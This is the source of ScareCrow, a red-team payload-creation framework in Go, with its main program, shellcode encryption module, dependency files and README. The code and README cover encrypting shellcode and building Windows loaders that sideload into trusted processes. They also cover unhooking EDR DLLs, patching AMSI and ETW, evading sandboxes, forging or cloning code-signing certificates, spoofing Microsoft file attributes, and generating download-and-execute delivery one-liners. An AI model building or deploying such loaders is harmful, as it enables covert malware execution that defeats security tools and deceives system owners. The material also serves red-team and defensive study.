├── Screenshots ├── ScareCrow.png ├── File_Attributes.png ├── Refreshed_Dlls.png └── PreRefreshed_Dlls.png ├── go.mod ├── main.json ├── go.sum ├── Cryptor └── Cryptor.go ├── ScareCrow.go ├── README.md ├── Struct └── Struct.go ├── limelighter └── limelighter.go └── Loader └── Loader.go /Screenshots/ScareCrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/optiv/ScareCrow/HEAD/Screenshots/ScareCrow.png -------------------------------------------------------------------------------- /Screenshots/File_Attributes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/optiv/ScareCrow/HEAD/Screenshots/File_Attributes.png -------------------------------------------------------------------------------- /Screenshots/Refreshed_Dlls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/optiv/ScareCrow/HEAD/Screenshots/Refreshed_Dlls.png -------------------------------------------------------------------------------- /Screenshots/PreRefreshed_Dlls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/optiv/ScareCrow/HEAD/Screenshots/PreRefreshed_Dlls.png -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module ScareCrow 2 | 3 | go 1.19 4 | 5 | require ( 6 | github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee 7 | github.com/fatih/color v1.13.0 8 | github.com/josephspurrier/goversioninfo v1.4.0 9 | ) 10 | 11 | require ( 12 | github.com/akavel/rsrc v0.10.2 // indirect 13 | github.com/mattn/go-colorable v0.1.9 // indirect 14 | github.com/mattn/go-isatty v0.0.14 // indirect 15 | github.com/ulikunitz/xz v0.5.11 // indirect 16 | golang.org/x/sys v0.3.0 // indirect 17 | ) 18 | -------------------------------------------------------------------------------- /main.json: -------------------------------------------------------------------------------- 1 | { 2 | "FixedFileInfo": { 3 | "FileVersion": { 4 | "Major": 1, 5 | "Minor": 0, 6 | "Patch": 0, 7 | "Build": 0 8 | }, 9 | "ProductVersion": { 10 | "Major": 1, 11 | "Minor": 0, 12 | "Patch": 0, 13 | "Build": 0 14 | } 15 | }, 16 | "StringFileInfo": { 17 | "CompanyName": "Microsoft Corporation", 18 | "FileDescription": "Microsoft Corporation", 19 | "FileVersion": "Microsoft Corporation", 20 | "InternalName": "test", 21 | "LegalCopyright": "Microsoft Corporation", 22 | "OriginalFilename": "Microsoft Corporation", 23 | "ProductName": "Microsoft Corporation", 24 | "ProductVersion": "Microsoft Corporation" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee h1:neBp9wDYVY4Uu1gGlrL+IL4JeZslz+hGEAjBXGAPWak= 2 | github.com/Binject/debug v0.0.0-20211007083345-9605c99179ee/go.mod h1:QzgxDLY/qdKlvnbnb65eqTedhvQPbaSP2NqIbcuKvsQ= 3 | github.com/akavel/rsrc v0.10.2 h1:Zxm8V5eI1hW4gGaYsJQUhxpjkENuG91ki8B4zCrvEsw= 4 | github.com/akavel/rsrc v0.10.2/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c= 5 | github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= 6 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 7 | github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w= 8 | github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk= 9 | github.com/josephspurrier/goversioninfo v1.4.0 h1:Puhl12NSHUSALHSuzYwPYQkqa2E1+7SrtAPJorKK0C8= 10 | github.com/josephspurrier/goversioninfo v1.4.0/go.mod h1:JWzv5rKQr+MmW+LvM412ToT/IkYDZjaclF2pKDss8IY= 11 | github.com/mattn/go-colorable v0.1.9 h1:sqDoxXbdeALODt0DAeJCVp38ps9ZogZEAXjus69YV3U= 12 | github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= 13 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= 14 | github.com/mattn/go-isatty v0.0.14 h1:yVuAays6BHfxijgZPzw+3Zlu5yQgKGP2/hcQbHb7S9Y= 15 | github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= 16 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 17 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 18 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 19 | github.com/stretchr/testify v1.6.1 h1:hDPOHmpOpP40lSULcqw7IrRb/u7w6RpDC9399XyoNd0= 20 | github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 21 | github.com/ulikunitz/xz v0.5.11 h1:kpFauv27b6ynzBNT/Xy+1k+fK4WswhN/6PN5WhFAGw8= 22 | github.com/ulikunitz/xz v0.5.11/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= 23 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 24 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 25 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c h1:F1jZWGFhYfh0Ci55sIpILtKKK8p3i2/krTr0H1rg74I= 26 | golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 27 | golang.org/x/sys v0.3.0 h1:w8ZOecv6NaNa/zC8944JTU3vz4u6Lagfk4RPQxv92NQ= 28 | golang.org/x/sys v0.3.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 29 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 30 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo= 31 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 32 | -------------------------------------------------------------------------------- /Cryptor/Cryptor.go: -------------------------------------------------------------------------------- 1 | package Cryptor 2 | 3 | import ( 4 | "bytes" 5 | "crypto/aes" 6 | "crypto/cipher" 7 | "crypto/rand" 8 | "crypto/rc4" 9 | "encoding/hex" 10 | "errors" 11 | "fmt" 12 | "io" 13 | "io/ioutil" 14 | "log" 15 | crand "math/rand" 16 | "time" 17 | 18 | "github.com/ulikunitz/xz" 19 | ) 20 | 21 | const capletters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 22 | const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" 23 | const hexchar = "abcef12345678890" 24 | 25 | var ( 26 | ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize") 27 | 28 | ErrInvalidPKCS7Data = errors.New("[-] Invalid PKCS7 Data (Empty or Not Padded)") 29 | 30 | ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input") 31 | ) 32 | 33 | func EncryptShellcode(inputFile string, encryptionmode string) (string, string, string) { 34 | var rawbyte []byte 35 | var b64ciphertext, b64key, b64iv string 36 | src, _ := ioutil.ReadFile(inputFile) 37 | if encryptionmode == "AES" { 38 | rawbyte = src 39 | key := RandomBuffer(32) 40 | iv := RandomBuffer(16) 41 | 42 | block, err := aes.NewCipher(key) 43 | if err != nil { 44 | log.Fatal(err) 45 | } 46 | paddedInput, err := Pkcs7Pad([]byte(rawbyte), aes.BlockSize) 47 | if err != nil { 48 | log.Fatal(err) 49 | } 50 | cipherText := make([]byte, len(paddedInput)) 51 | ciphermode := cipher.NewCBCEncrypter(block, iv) 52 | ciphermode.CryptBlocks(cipherText, paddedInput) 53 | b64ciphertext = fmt.Sprintf("%x", cipherText) 54 | b64key = fmt.Sprintf("%x", key) 55 | b64iv = fmt.Sprintf("%x", iv) 56 | return b64ciphertext, b64key, b64iv 57 | } 58 | if encryptionmode == "ELZMA" { 59 | var buf bytes.Buffer 60 | fmt.Println("[*] Encrypting Shellcode Using ELZMA Encryption") 61 | w, err := xz.NewWriter(&buf) 62 | if err != nil { 63 | log.Fatalf("xz.NewWriter error %s", err) 64 | } 65 | if _, err := io.WriteString(w, string(src)); err != nil { 66 | log.Fatalf("WriteString error %s", err) 67 | } 68 | if err := w.Close(); err != nil { 69 | log.Fatalf("w.Close error %s", err) 70 | } 71 | fart := fmt.Sprintf("%x", buf.Bytes()) 72 | b64ciphertext = fart 73 | return b64ciphertext, b64key, b64key 74 | } 75 | if encryptionmode == "RC4" { 76 | plaintext := []byte(src) 77 | fmt.Println("[*] Encrypting Shellcode Using RC4 Encryption") 78 | key, _ := generateRandomBytes(32) 79 | block, _ := rc4.NewCipher(key) 80 | ciphertext := make([]byte, len(plaintext)) 81 | block.XORKeyStream(ciphertext, plaintext) 82 | 83 | b64ciphertext = fmt.Sprintf("%x", ciphertext) 84 | b64key = fmt.Sprintf("%x", key) 85 | 86 | } 87 | return b64ciphertext, b64key, b64iv 88 | 89 | } 90 | 91 | func generateRandomBytes(n int) ([]byte, error) { 92 | b := make([]byte, n) 93 | _, err := rand.Read(b) 94 | if err != nil { 95 | return nil, err 96 | } 97 | 98 | return b, nil 99 | } 100 | 101 | func Pkcs7Pad(b []byte, blocksize int) ([]byte, error) { 102 | if blocksize <= 0 { 103 | return nil, ErrInvalidBlockSize 104 | } 105 | if b == nil || len(b) == 0 { 106 | return nil, ErrInvalidPKCS7Data 107 | } 108 | n := blocksize - (len(b) % blocksize) 109 | pb := make([]byte, len(b)+n) 110 | copy(pb, b) 111 | copy(pb[len(b):], bytes.Repeat([]byte{byte(n)}, n)) 112 | return pb, nil 113 | } 114 | 115 | func RandomBuffer(size int) []byte { 116 | buffer := make([]byte, size) 117 | _, err := rand.Read(buffer) 118 | if err != nil { 119 | log.Fatal(err) 120 | } 121 | return buffer 122 | } 123 | 124 | func RandStringBytes(n int) string { 125 | b := make([]byte, n) 126 | for i := range b { 127 | b[i] = letters[crand.Intn(len(letters))] 128 | 129 | } 130 | return string(b) 131 | } 132 | 133 | func Mangle(n int) string { 134 | b := make([]byte, n) 135 | for i := range b { 136 | b[i] = hexchar[crand.Intn(len(hexchar))] 137 | 138 | } 139 | return string(b) 140 | } 141 | 142 | func VarNumberLength(min, max int) string { 143 | var r string 144 | crand.Seed(time.Now().UnixNano()) 145 | num := crand.Intn(max-min) + min 146 | n := num 147 | r = RandStringBytes(n) 148 | return r 149 | } 150 | 151 | func printHexOutput(input ...[]byte) { 152 | for _, i := range input { 153 | fmt.Println(hex.EncodeToString(i)) 154 | } 155 | } 156 | 157 | func GenerateNumer(min, max int) int { 158 | crand.Seed(time.Now().UnixNano()) 159 | num := crand.Intn(max-min) + min 160 | n := num 161 | return n 162 | 163 | } 164 | 165 | func CapLetter() string { 166 | n := 1 167 | b := make([]byte, n) 168 | for i := range b { 169 | b[i] = capletters[crand.Intn(len(capletters))] 170 | 171 | } 172 | return string(b) 173 | } 174 | -------------------------------------------------------------------------------- /ScareCrow.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "ScareCrow/Cryptor" 5 | "ScareCrow/Loader" 6 | "ScareCrow/Utils" 7 | "ScareCrow/limelighter" 8 | "bytes" 9 | "flag" 10 | "fmt" 11 | "log" 12 | "os" 13 | "os/exec" 14 | ) 15 | 16 | type FlagOptions struct { 17 | outFile string 18 | inputFile string 19 | URL string 20 | LoaderType string 21 | CommandLoader string 22 | domain string 23 | password string 24 | valid string 25 | configfile string 26 | ProcessInjection string 27 | AMSI bool 28 | ETW bool 29 | Sha bool 30 | console bool 31 | refresher bool 32 | sandbox bool 33 | sleep bool 34 | nosign bool 35 | evasion string 36 | path string 37 | obfuscate bool 38 | export string 39 | clone string 40 | KnownDLLs bool 41 | encryptionmode string 42 | exectype string 43 | } 44 | 45 | func options() *FlagOptions { 46 | outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.") 47 | inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.") 48 | console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.") 49 | LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload: 50 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) 51 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. 52 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. 53 | [*] excel - Loads into a hidden Excel process using a JScript loader. 54 | [*] msiexec - Loads into MSIexec process using a JScript loader. 55 | [*] wscript - Loads into WScript process using a JScript loader.`) 56 | URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)") 57 | CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely: 58 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel, and Wscript Loaders). 59 | [*] hta - Generates a blank hta file containing the loader along with an MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). 60 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel, and Wscript Loaders).`) 61 | domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ") 62 | exectype := flag.String("Exec", "RtlCopy", `Set the template to execute the shellcode: 63 | [*] RtlCopy - Using RtlCopy to move the shellcode into the allocated address in the current running process by making a Syscall. 64 | [*] ProcessInjection - Process Injection Mode. 65 | [*] NtQueueApcThreadEx - Executes the shellcode by creating an asynchronous procedure call (APC) to a target thread. 66 | [*] VirtualAlloc - Allocates shellcode into the process using custom syscalls in the current running process`) 67 | evasion := flag.String("Evasion", "Disk", `Sets the type of EDR unhooking technique: 68 | [*] Disk - Retrives a clean version of the DLLs ".text" field from files stored on disk. 69 | [*] KnownDLL - Retrives a clean version of the DLLs ".text" field from the KnownDLLs directory in the object namespace. 70 | [*] None - The Loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls.`) 71 | password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.") 72 | AMSI := flag.Bool("noamsi", false, "Disables the AMSI patching that prevents AMSI BufferScanner.") 73 | ETW := flag.Bool("noetw", false, "Disables the ETW patching that prevents ETW events from being generated.") 74 | ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).") 75 | configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the default ones.") 76 | valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.") 77 | sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainJoined calls.`) 78 | sleep := flag.Bool("nosleep", false, `Disables the sleep delay before the loader unhooks and executes the shellcode.`) 79 | nosign := flag.Bool("nosign", false, `Disables file signing, making -domain/-valid/-password parameters not required.`) 80 | path := flag.String("outpath", "", "The path to put the final Payload/Loader once it's compiled.") 81 | obfuscate := flag.Bool("obfu", false, `Enables Garbles Literal flag replaces golang libray strings with more complex variants, resolving to the same value at run-time. This creates a larger loader and times longer to compile`) 82 | export := flag.String("export", "", "For DLL Loaders Only - Specify an Export function for a loader to have.") 83 | encryptionmode := flag.String("encryptionmode", "ELZMA", `Sets the type of encryption to encrypt the shellcode: 84 | [*] AES - Enables AES 256 encryption. 85 | [*] ELZMA - Enables ELZMA encryption. 86 | [*] RC4 - Enables RC4 encryption.`) 87 | clone := flag.String("clone", "", "Path to the file containing the certificate you want to clone") 88 | flag.Parse() 89 | return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, evasion: *evasion, password: *password, configfile: *configfile, console: *console, AMSI: *AMSI, ETW: *ETW, exectype: *exectype, ProcessInjection: *ProcessInjection, valid: *valid, sandbox: *sandbox, sleep: *sleep, path: *path, nosign: *nosign, obfuscate: *obfuscate, export: *export, encryptionmode: *encryptionmode, clone: *clone} 90 | } 91 | 92 | func execute(opt *FlagOptions, name string) string { 93 | bin, _ := exec.LookPath("env") 94 | var compiledname string 95 | var cmd *exec.Cmd 96 | if opt.configfile != "" { 97 | oldname := name 98 | cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"") 99 | err := cmd.Run() 100 | if err != nil { 101 | fmt.Printf("error") 102 | } 103 | } else { 104 | name = limelighter.FileProperties(name, opt.configfile) 105 | } 106 | if opt.LoaderType == "binary" { 107 | if opt.obfuscate == true { 108 | cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-literals", "-seed=random", "build", "-o", ""+name+".exe") 109 | } else { 110 | cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "go", "build", "-trimpath", "-ldflags=-w -s -buildid=", "-o", ""+name+".exe") 111 | 112 | } 113 | } else { 114 | cwd, err := os.Getwd() 115 | if err != nil { 116 | fmt.Println(err) 117 | } 118 | if opt.obfuscate == true { 119 | cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "-literals", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") 120 | 121 | } else { 122 | cmd = exec.Command(bin, "GOPRIVATE=*", "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "GOFLAGS=-ldflags=-s", "GOFLAGS=-ldflags=-w", "../.lib/garble", "-seed=random", "build", "-a", "-trimpath", "-ldflags=-extldflags=-Wl,"+cwd+"/"+name+".exp -w -s -buildid=", "-o", ""+name+".dll", "-buildmode=c-shared") 123 | } 124 | } 125 | if opt.obfuscate == true { 126 | fmt.Println("[*] Compiling Payload with the Garble's literal flag... this will take a while") 127 | } else { 128 | fmt.Println("[*] Compiling Payload") 129 | } 130 | var out bytes.Buffer 131 | var stderr bytes.Buffer 132 | cmd.Stdout = &out 133 | cmd.Stderr = &stderr 134 | err := cmd.Run() 135 | if err != nil { 136 | fmt.Printf("%s: %s\n", err, stderr.String()) 137 | } 138 | if opt.LoaderType == "binary" { 139 | compiledname = name + ".exe" 140 | } else { 141 | compiledname = name + ".dll" 142 | } 143 | 144 | fmt.Println("[+] Payload Compiled") 145 | 146 | if opt.nosign == false { 147 | limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname) 148 | } 149 | if opt.clone != "" { 150 | limelighter.Cloner(compiledname, opt.clone) 151 | } 152 | return name 153 | } 154 | 155 | func main() { 156 | fmt.Println(` 157 | _________ _________ 158 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ 159 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / 160 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / 161 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ 162 | \/ \/ \/ \/ \/ 163 | (@Tyl0us) 164 | “Fear, you must understand is more than a mere obstacle. 165 | Fear is a TEACHER. the first one you ever had.” 166 | `) 167 | Utils.Version() 168 | opt := options() 169 | 170 | if opt.inputFile == "" { 171 | log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)") 172 | } 173 | 174 | if opt.CommandLoader != "" && opt.URL == "" { 175 | log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command") 176 | } 177 | 178 | if opt.exectype != "RtlCopy" && opt.exectype != "NtQueueApcThreadEx" && opt.exectype != "ProcessInjection" && opt.exectype != "VirtualAlloc" { 179 | log.Fatal("Error: Invalid execution type, please select one of the allowed types") 180 | } 181 | 182 | if opt.evasion != "Disk" && opt.evasion != "KnownDLL" && opt.evasion != "None" { 183 | log.Fatal("Error: Invalid evasion method, please select one of the allowed") 184 | } 185 | 186 | if opt.encryptionmode != "AES" && opt.encryptionmode != "ELZMA" && opt.encryptionmode != "RC4" { 187 | log.Fatal("Error: Invalid encrpytion type, please select one of the allowed encrpytion types") 188 | } 189 | 190 | if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" { 191 | log.Fatal("Error: Invalid loader, please select one of the allowed loader types") 192 | } 193 | 194 | if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" { 195 | log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types") 196 | } 197 | 198 | if opt.CommandLoader == "hta" && opt.outFile == "" { 199 | log.Fatal("Error: Please provide the a HTA filename to store the loader in") 200 | } 201 | 202 | if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") { 203 | log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command") 204 | } 205 | 206 | if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") { 207 | fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing") 208 | } 209 | 210 | if opt.outFile == "" && (opt.LoaderType == "wscript" || opt.LoaderType == "excel") { 211 | log.Fatal("Error: -O is needed for these types of loaders") 212 | } 213 | 214 | if opt.LoaderType == "binary" && opt.refresher == true { 215 | log.Fatal("Error: Can not use the unmodified option with a binary loader") 216 | } 217 | 218 | if opt.console == true && opt.LoaderType != "binary" { 219 | log.Fatal("Error: Console mode is only for binary based payloads") 220 | } 221 | 222 | if opt.domain == "" && opt.password == "" && opt.valid == "" && opt.nosign == false { 223 | log.Fatal("Error: Please provide a domain in order to generate a code signing certificate") 224 | } 225 | 226 | if opt.domain != "" && opt.password != "" && opt.valid != "" && opt.nosign == false { 227 | log.Fatal("Error: Please choose either -domain or -valid with -password to generate a code signing certificate") 228 | } 229 | 230 | if opt.password == "" && opt.valid != "" { 231 | log.Fatal("Error: Please provide a password for the valid code signing certificate") 232 | } 233 | 234 | if opt.ProcessInjection != "" && (opt.ETW == true || opt.AMSI == true) { 235 | fmt.Println("[!] Currently ETW and AMSI patching only affects the parent process not the injected process") 236 | } 237 | 238 | if opt.ProcessInjection != "" && opt.refresher == true { 239 | log.Fatal("Error: Can not use the unmodified option with the process injection loaders") 240 | } 241 | if opt.LoaderType != "dll" && opt.export != "" { 242 | log.Fatal("Error: Export option can only be used with DLL loaders ") 243 | } 244 | 245 | Utils.CheckGarble() 246 | b64ciphertext, b64key, b64iv := Cryptor.EncryptShellcode(opt.inputFile, opt.encryptionmode) 247 | fmt.Println("[+] Shellcode Encrypted") 248 | name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection, opt.sleep, opt.AMSI, opt.export, opt.encryptionmode, opt.exectype, opt.evasion) 249 | name = execute(opt, name) 250 | Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox, opt.path) 251 | 252 | } 253 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # THIS REPOSITORY HAS BEEN ARCHIVED 2 | 3 | To view the latest version of ScareCrow or to submit an issue, reference https://github.com/Tylous/ScareCrow. 4 | 5 |

6 |
7 | 8 |
9 | ScareCrow 10 |

11 | 12 | 13 | 14 | ## More Information 15 | If you want to learn more about the techniques utilized in this framework please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught) 16 | # 17 | 18 | ## Description 19 | ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. 20 | 21 | ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. 22 | 23 | ScareCrow uses 1 of 2 methods to unhook 24 | 25 | ### Disk 26 | 27 | When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead it only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this, ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. 28 | 29 | To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. 30 | 31 | 32 | 33 | #### Indirect Syscalls 34 | 35 | ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by one of three encryption methods (outlined below). Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified, ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLMain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. 36 | ### Binary Sample 37 |

38 | 39 | After 40 |

41 | 42 | ### KnownDLLs 43 | 44 | KnownDLLs is a list of DLLs that are loaded by Windows during the system startup process. Because these DLLs are considered to be essential to the functioning of the operating system, they are cached to help reduce load times and improve performance when applications start up. KnownDLLs includes DLLs such as kernel32.dll, kernelbase.dll, and ntdll.dll. 45 | 46 | Utilizing these KnownDlls, ScareCrow maps a copy of the DLL from `\KnownDlls\` using a combination of NtOpenSection and NtMapViewOfSection to load it into the process's memory. ScareCrow doesn't load the entire DLL, rather it only loads in the .text section of the DLL (as this contains all the syscalls). From there ScareCrow use indirect Syscalls to call NtProtectVirtualMemory and change the permissions of the dll's .text memory section to allow Scarecrow to overwrite the EDR’s hooks before restoring permissions. 47 | 48 | 49 | For more information you can read modexp's detailed [article]("https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/") 50 | 51 | 52 | Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. 53 | 54 | During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things: 55 | 56 | Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option. 57 | 58 | * ScareCrow also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes. This option can use DLL or .exe files to copy using the `clone` command-line option, along with the path to the file you want to copy the certificate from. 59 | 60 | 61 | #### OpSec Consideration: 62 | When signing the loader with microsoft.com, using them against WINDOWS DEFENDER ATP products may not be as effective as they can validate the cert as it belongs to them. If you are using a loader against a windows product, possibly use a different domain. 63 | * Spoof the attributes of the loader: 64 | This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned. 65 | 66 | ### File Attribute Sample 67 | 68 |

